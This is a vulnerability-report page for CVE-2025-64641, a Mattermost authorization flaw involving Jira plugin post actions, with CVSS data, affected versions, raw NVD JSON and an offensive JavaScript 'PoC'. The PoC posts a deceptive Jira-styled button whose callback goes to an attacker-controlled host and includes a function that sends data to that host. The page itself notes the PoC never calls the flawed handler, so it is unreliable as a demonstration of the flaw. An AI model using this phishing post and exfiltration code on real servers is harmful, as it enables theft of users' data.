Security Vulnerability Report
CVE-2025-64641 CVSS 4.1 MEDIUM

CVE-2025-64641

Published: 2025-12-24 08:15:46
Last Modified: 2025-12-31 18:55:29

Description

Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3 and 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin. A malicious Mattermost user could therefore author a post whose action invoked that endpoint, and Jira tickets were exfiltrated when victim users interacted with the affected post. NVD classifies the weakness as CWE-863 (Incorrect Authorization).

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.8) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.12.0 <= version < 10.12.4) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.0.0 <= version < 11.0.6) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.1.0 <= version < 11.1.1) - VULNERABLE
Mattermost 11.1.x <= 11.1.0 (fixed in 11.1.1)
Mattermost 11.0.x <= 11.0.5 (fixed in 11.0.6)
Mattermost 10.12.x <= 10.12.3 (fixed in 10.12.4)
Mattermost 10.11.x <= 10.11.7 (fixed in 10.11.8)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it is a scaffold rather than a working exploit: it posts an attacker-authored interactive message whose button callback URL is the attacker's own server, and it never invokes the Jira plugin's /share-issue-publicly handler that the description identifies as the flawed component, so on its own it does not demonstrate the ticket exfiltration.
javascript
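// CVE-2025-64641 PoC - Malicious Post Action Injection
//
// Creates a Mattermost post that carries an interactive button whose
// `integration.url` points at an attacker-controlled host, dressed up to look
// like a Jira-plugin post. Any authenticated user can create such a post
// (CVSS PR:L); the victim has to click the button (UI:R).
//
// NOTE(review): the advisory says the Jira plugin's /share-issue-publicly
// handler failed to verify that the invoking post action was created by the
// plugin. This script never calls that handler -- the button's callback URL
// is the attacker's own server, so a click only sends the post's `context`
// there. On its own it therefore does not reproduce the ticket exfiltration
// described; treat it as a scaffold and confirm the real action payload
// against the plugin source before relying on it.
//
// Requires Node 18+ (global fetch; no third-party modules).
// For security research and authorized testing only.

class MattermostJiraExploit {
  /**
   * @param {string} mattermostUrl - Base URL of the target server, without a
   *   trailing slash (paths are appended with a leading `/`).
   * @param {string} attackerToken - Bearer token of the attacker's Mattermost account.
   * @param {string} targetChannelId - Channel the victim will read the post in.
   * @param {string} [attackerServer] - Host that receives the button callback.
   */
  constructor(
    mattermostUrl,
    attackerToken,
    targetChannelId,
    attackerServer = 'https://attacker-controlled-server.com',
  ) {
    this.baseUrl = mattermostUrl;
    this.token = attackerToken;
    this.channelId = targetChannelId;
    this.attackerServer = attackerServer;
  }

  /**
   * Build the JSON body for `POST /api/v4/posts`. Pure (no I/O), so the
   * crafted payload can be inspected or tested without a server.
   * @returns {object} Post body with one attachment carrying one button action.
   */
  buildPostPayload() {
    return {
      channel_id: this.channelId,
      message: 'Jira Issue Update: Please review',
      props: {
        attachments: [
          {
            pretext: 'Jira ticket has been shared with you',
            title: 'Project Security Issue',
            actions: [
              {
                id: 'malicious-share-action',
                name: 'View Details',
                type: 'button',
                integration: {
                  // Callback target for the click -- attacker-controlled.
                  url: `${this.attackerServer}/collect`,
                  context: {
                    action: 'share-issue-publicly',
                    // Literal placeholder: nothing in this script fills it
                    // in, and `context` is presumably echoed back to
                    // `integration.url` verbatim on click -- confirm.
                    jira_ticket_data: '{{jira_ticket}}',
                  },
                },
              },
            ],
          },
        ],
      },
    };
  }

  /**
   * Create the crafted post in the target channel.
   * @returns {Promise<string>} Id of the created post.
   * @throws {Error} When the request fails or the server answers non-2xx
   *   (wraps the underlying error as `cause`).
   */
  async createMaliciousPost() {
    let response;
    try {
      response = await fetch(`${this.baseUrl}/api/v4/posts`, {
        method: 'POST',
        headers: {
          Authorization: `Bearer ${this.token}`,
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(this.buildPostPayload()),
      });
    } catch (err) {
      throw new Error(`Failed to create post: ${err.message}`, { cause: err });
    }
    if (!response.ok) {
      throw new Error(`Failed to create post: HTTP ${response.status}`);
    }
    const data = await response.json();
    console.log('Malicious post created:', data.id);
    return data.id;
  }

  /**
   * Forward collected data to the attacker's server.
   *
   * Not wired to anything: nothing in this script calls it, and whatever the
   * button click sends is received by `attackerServer` out of band, not by
   * this process. Kept for callers that want to relay data manually.
   * @param {unknown} exfiltratedData - Payload to forward.
   * @throws {Error} On network failure or a non-2xx response.
   */
  async exfiltrateData(exfiltratedData) {
    const response = await fetch(`${this.attackerServer}/collect`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        cve: 'CVE-2025-64641',
        timestamp: new Date().toISOString(),
        data: exfiltratedData,
        source: 'mattermost_jira_integration',
      }),
    });
    if (!response.ok) {
      throw new Error(`Exfiltration request failed: HTTP ${response.status}`);
    }
    console.log('Data exfiltration successful');
  }
}

/**
 * Entry point. Target settings come from the environment rather than being
 * hard-coded placeholders, so the script never fires at a dummy host or
 * embeds a token in source. Does nothing but print usage when unconfigured.
 */
async function main() {
  const {
    MATTERMOST_URL,
    MATTERMOST_TOKEN,
    MATTERMOST_CHANNEL_ID,
    ATTACKER_SERVER,
  } = process.env;
  if (!MATTERMOST_URL || !MATTERMOST_TOKEN || !MATTERMOST_CHANNEL_ID) {
    console.error(
      'Usage: MATTERMOST_URL=<base url> MATTERMOST_TOKEN=<token> ' +
        'MATTERMOST_CHANNEL_ID=<channel id> [ATTACKER_SERVER=<url>] node poc.js',
    );
    return;
  }
  const exploit = new MattermostJiraExploit(
    MATTERMOST_URL,
    MATTERMOST_TOKEN,
    MATTERMOST_CHANNEL_ID,
    ATTACKER_SERVER,
  );
  await exploit.createMaliciousPost();
}

// Surface failures with a non-zero exit instead of leaving the promise floating.
main().catch((err) => {
  console.error(err);
  process.exitCode = 1;
});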

References

https://mattermost.com/security-updates (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64641", "sourceIdentifier": "[email protected]", "published": "2025-12-24T08:15:46.487", "lastModified": "2025-12-31T18:55:29.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin which allowed a malicious Mattermost user to exfiltrate Jira tickets when victim users interacted with affected posts"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.8", "matchCriteriaId": "7B0477E2-8999-4E1D-9E6B-7A818CB76488"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.4", "matchCriteriaId": "B83EB4C3-5E75-4BD1-94F3-ED29D329E5C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "B6EAC2A0-B481-45EA-90AE-F950921DB06A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.1", "matchCriteriaId": "387573EC-2596-4529-BD43-054E52D34EC0"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}